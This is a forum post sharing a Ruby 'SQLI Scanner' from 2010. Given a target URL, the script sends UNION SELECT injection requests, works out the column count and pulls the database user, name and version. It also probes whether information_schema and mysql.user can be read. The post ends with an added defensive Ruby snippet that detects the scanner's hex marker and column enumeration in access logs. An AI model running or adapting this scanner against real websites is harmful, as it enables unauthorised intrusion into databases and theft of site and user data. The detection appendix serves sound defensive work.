
Ruby [Ruby] SQLI Scanner

Doddy
A SQLI scanner in Ruby

Code:

#!/usr/bin/ruby
# SQLI Scanner (C) Doddy Hackman 2010
# contact me : doddy-hackman.blogspot.com

require 'net/http'
require 'uri'

# Print usage
def uso
  print "\n[+] sqli.rb \n"
end

# Fetch a page over plain HTTP (port 80) and return the response body
def toma(host, path)
  http = Net::HTTP.new(host, 80)
  return http.get(path).body
end

# Replace the "hackman" placeholder column and read user, database and version
def details(web, more)
  web1 = more.sub(/hackman/, "0x4b30425241")
  more = more.sub(/hackman/, "concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  print "\n\n[+] Extracting information of the DB\n\n"
  url = URI.parse(web)
  code = toma(url.host, url.path + "?" + url.query + more)
  if code =~ /K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
    print "[username] : " + $1 + "\n"
    print "[database] : " + $2 + "\n"
    print "[version] : " + $3 + "\n\n"

    # Check whether these tables can be read
    test1 = toma(url.host, url.path + "?" + url.query + web1 + "+from+information_schema.tables")
    test2 = toma(url.host, url.path + "?" + url.query + web1 + "+from+mysql.user")

    if test1 =~ /K0BRA/
      print "[information_schema.tables] : ON\n"
    end

    if test2 =~ /K0BRA/
      print "[mysql.user] : ON"
    end
  else
    print "\n[-] Not Found\n\n"
  end
end

# Test the parameter, then try 2 to 25 columns until the marker is reflected
def scan(web)
  print "\n[+] Testing the vulnerability SQLI...\n\n"
  url = URI.parse(web)
  codetest = toma(url.host, url.path + "?" + url.query + "-1+union+select+1")
  if codetest =~ /The used SELECT statements have a different number of columns/
    print "[+] SQLI Detected\n\n"
  else
    print "[-] Not Vulnerable to SQLI\n\n"
    copyright()
  end

  z = "1"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  for num in ('2'..'25')
    z = z + "," + num
    x = x + "," + "concat(0x4b30425241," + num + ",0x4b30425241)"
    #print url.host,url.path+"?"+url.query+"-1+union+select+"+x+"\n"
    code = toma(url.host, url.path + "?" + url.query + "-1+union+select+" + x)
    if code =~ /K0BRA(.*?)K0BRA/
      print "[+] The Page has " + num + " columns\n"
      print "[+] The number " + $1 + " print data\n\n"
      z = z.sub($1, "hackman")
      print "[sqlI] : " + web + "-1+union+select+" + z
      details(web, "-1+union+select+" + z)
      copyright()
    end
  end
  print "\n\n[-] Not Found the numbers of the columns\n\n"
  copyright()
end

# Print the banner
def head()
  print "\n\n -- == SQLI Scanner == --\n\n"
end

# Print the footer and exit
def copyright()
  print "\n\n\n(C) Doddy Hackman 2010\n\n"
  exit(1)
end

head()
if !ARGV[0]
  uso()
else
  scan(ARGV[0])
  copyright()
end
copyright()

#The End ?
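
For defenders, the requests this script sends leave a recognizable trail in web server access logs: the hex marker 0x4b30425241 and a UNION SELECT list that grows by one column per request. The Ruby sketch below is an added example, not part of the original post; the log format, sample lines, addresses, function names and the three-width threshold are constructed assumptions.

```ruby
require 'uri'
MARKER = '0x4b30425241' # hex marker used by the posted script (ASCII "K0BRA")
UNION  = /union\s+select\s+(.+?)(?:\s+from\s|\z)/i

# Constructed sample access log; addresses are documentation ranges.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1-1+union+select+1 HTTP/1.1" 200 412
  203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1-1+union+select+concat(#{MARKER},1,#{MARKER}),concat(#{MARKER},2,#{MARKER}) HTTP/1.1" 200 398
  203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1-1+union+select+concat(#{MARKER},1,#{MARKER}),concat(#{MARKER},2,#{MARKER}),concat(#{MARKER},3,#{MARKER}) HTTP/1.1" 200 530
  203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1-1+union+select+1,#{MARKER},3+from+information_schema.tables HTTP/1.1" 200 530
  198.51.100.20 - - [01/Jan/2024:10:05:00 +0000] "GET /search?q=student+union+select+committee HTTP/1.1" 200 900
  198.51.100.20 - - [01/Jan/2024:10:05:09 +0000] "GET /index.php HTTP/1.1" 200 1200
LOG

# Count top-level commas so concat(a,b,c) is one column, not three.
def column_count(select_list)
  depth = 0
  count = 1
  select_list.each_char do |c|
    depth += { '(' => 1, ')' => -1 }.fetch(c, 0)
    count += 1 if c == ',' && depth.zero?
  end
  count
end

# Per-client summary of UNION SELECT requests found in the log text.
def analyze(log)
  report = Hash.new { |h, ip| h[ip] = { hits: 0, marker: false, widths: [] } }
  log.each_line do |line|
    next unless (m = line.match(/\A(\S+) .*?"(?:GET|POST) (\S+) HTTP/))
    target = begin
      URI.decode_www_form_component(m[2]) # '+' and %XX become plain text
    rescue ArgumentError
      m[2] # malformed percent-encoding: inspect the raw request instead
    end
    next unless (u = target.match(UNION))
    e = report[m[1]]
    e[:hits] += 1
    e[:marker] ||= target.downcase.include?(MARKER)
    e[:widths] << column_count(u[1])
  end
  report.each_value do |e|
    w = e[:widths].uniq.sort
    # Three or more distinct, consecutive widths indicate column enumeration.
    e[:enumeration] = w.size >= 3 && w.each_cons(2).all? { |a, b| b == a + 1 }
  end
  report
end

analyze(SAMPLE_LOG).each { |ip, e| puts "#{ip} #{e}" } if __FILE__ == $PROGRAM_NAME
```

The benign search request still counts as a hit, but it carries neither the marker nor a growing column count, which is what separates it from the scanner's traffic.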
 